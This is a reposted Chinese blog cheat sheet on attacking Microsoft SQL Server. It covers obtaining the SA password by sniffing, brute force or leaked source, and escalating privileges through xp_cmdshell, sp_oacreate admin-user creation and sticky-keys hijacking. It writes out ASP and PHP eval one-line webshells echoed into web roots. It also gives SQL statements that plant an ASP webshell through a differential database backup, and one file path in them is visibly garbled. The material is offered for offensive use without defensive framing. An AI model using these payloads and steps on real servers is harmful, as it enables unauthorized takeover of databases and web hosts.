zoukankan      html  css  js  c++  java
  • MSSQL 漏洞利用与提权

    1、SA口令的获取

    webshell或源代码的获取

    源代码泄露

    嗅探(用CAIN等工具嗅探1433数据库端口)

    口令暴力破解

    2、常见SQL server 提权命令

    查看数据库的版本(select @@version;)

    查看数据库所在服务器操作系统的参数

    查看数据库启动的参数

    查看数据库启动的时间

    查看数据库服务器名和实例名

    查看用户登录信息

    查看数据库里所所有的存储工程和函数

    查看数据库里用户和进程的信息

    恢复存储过程

    开启和关闭xp_cmdshell

    xp_cmdshell执行命令

    开启和关闭sp_oacreate

    sp_oacreate删除文件

    sp_oacreate复制文件

    sp_oacreate移动文件

    sp_oacreate添加管理员用户

    开启和关闭sp_makeweblask

    wscript.shell执行命令

    shell.applocation执行命令

    开启和关闭openrowset

    沙盒执行命令

    注册表劫持粘贴键

    sp_oacreate替换粘贴键

    public提权操作

    echo一句话后门(echo  <%eval request(cmd)%> >d:wwwrootok.asp    echo  <? php @eval($_POST[cmd]);?> >cmd.php)

    在mssql 中查询password

    3、通过数据库备份获取webshell

    差异备份一句话木马

    backup database [当前数据库名] to disk = 'c: ecycler1.bak'

    create table cmd (a image);

    insert into cmd(a) values ('<%eval request("cmd")%>');

    backup database [当前数据库名] to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT--

    LOG 备份一句话木马(......)

  • 相关阅读:
    python模块--time模块
    python模块--如何相互调用自己写的模块
    Animating Views Using Scenes and Transitions
    fragment 切换
    android textview 设置text 字体
    android intent 5.1
    android EditView ime
    animation of android (4)
    animation of android (3)
    animation of android (2)
  • 原文地址:https://www.cnblogs.com/linuxsec/p/10012624.html
Copyright © 2011-2022 走看看